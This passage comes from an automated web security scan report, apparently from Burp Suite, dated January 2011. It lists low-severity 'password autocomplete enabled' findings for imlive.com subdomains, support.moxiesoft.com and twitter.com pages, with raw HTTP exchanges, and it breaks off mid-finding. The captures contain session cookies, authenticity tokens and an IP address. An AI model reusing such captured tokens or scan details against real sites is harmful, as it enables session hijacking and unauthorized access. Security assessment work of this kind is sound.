Date: Fri, 28 Jan 2011 14:25:14 GMT
Connection: close
Content-Length: 17934
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.23. http://no.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:
/members.aspx
The form contains the following password field with autocomplete enabled:
txtPassword

Request

GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=aqcwk4afu03wgg45ktqavz45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=aqcwk4afu03wgg45ktqavz45; path=/; HttpOnly
Set-Cookie: spvdr=vd=cb56a9d1-56fd-458b-a829-3574e99ee9f7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 18070
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.24. http://pu.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:

/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bvm3hmbu4vshg5ioczqvkua2; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bvm3hmbu4vshg5ioczqvkua2; path=/; HttpOnly
Set-Cookie: spvdr=vd=17b1032e-9627-4037-aed9-7b33fd1318f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 20659
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.25. http://ru.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:

/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ligj3o45prg41k55vc4qg52m; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ligj3o45prg41k55vc4qg52m; path=/; HttpOnly
Set-Cookie: spvdr=vd=5d548b95-834a-4b5b-a38b-38fb7d9bb957&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:20 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:19 GMT
Connection: close
Content-Length: 20234
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.26. http://se.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:

/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wl23onyo1tkdis45s1sxe545; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wl23onyo1tkdis45s1sxe545; path=/; HttpOnly
Set-Cookie: spvdr=vd=bb5a5452-c2c5-404a-ad75-499130dd5dbd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 18020
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.27. http://support.moxiesoft.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The page contains a form with the following action URL:

login.asp

The form contains the following password field with autocomplete enabled:

txtPasswd

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Fri, 28 Jan 2011 14:10:59 GMT
Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...
<!-- login box starts -->
                                   <form id="frmNewLogin" name="frmNewLogin" method="post" action="login.asp">
                                   <input type="hidden" id="txtProductID" name="txtProductID">
...[SNIP]...
<td width="150"><input type="password" name="txtPasswd" id="txtPasswd" /></td>
...[SNIP]...

12.28. http://tr.imlive.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL:

/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pmrw12jgsksj3kvxm3majzb2; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=pmrw12jgsksj3kvxm3majzb2; path=/; HttpOnly
Set-Cookie: spvdr=vd=1b813c63-80cf-4620-830f-91884d66145b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:32 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:32 GMT
Connection: close
Content-Length: 18499
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

12.29. http://twitter.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-35616-58920
ETag: "ce84c6d523ac490f74725d4e72e7cdcf"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-Runtime: 0.01412
Content-Type: text/html; charset=utf-8
Content-Length: 44218
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="8b978bcbabe45106f2decb4bf7087bc43ae9891d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.30. http://twitter.com/247realmedia

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /247realmedia

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /247realmedia HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234368-40068-57715
ETag: "f2ddcf301113c2efcb23646f68ea6493"
Last-Modified: Fri, 28 Jan 2011 17:06:08 GMT
X-Runtime: 0.01625
Content-Type: text/html; charset=utf-8
Content-Length: 49998
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.31. http://twitter.com/AddThis

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /AddThis

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /AddThis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-57668-31881
ETag: "a2ed93258e38abb440f9997e5bc5343f"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00798
Content-Type: text/html; charset=utf-8
Content-Length: 49756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="63206851f4e1bc1c227a6a18a474acc060dcd240" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.32. http://twitter.com/Applebees

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Applebees

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /Applebees HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-32426-51080
ETag: "6de1ef610ac1e89e0f9514036de3e619"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01745
Content-Type: text/html; charset=utf-8
Content-Length: 51962
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2ec45523a8677feeb9e75e648a73fef6ce232c38" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.33. http://twitter.com/AshieApple

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /AshieApple

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /AshieApple HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265972-35369-4983
ETag: "d630e94c0555a4dba001b1cdb5e86f78"
Last-Modified: Sat, 29 Jan 2011 01:52:52 GMT
X-Runtime: 0.01071
Content-Type: text/html; charset=utf-8
Content-Length: 29081
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.34. http://twitter.com/Beckett_News

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Beckett_News

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /Beckett_News HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
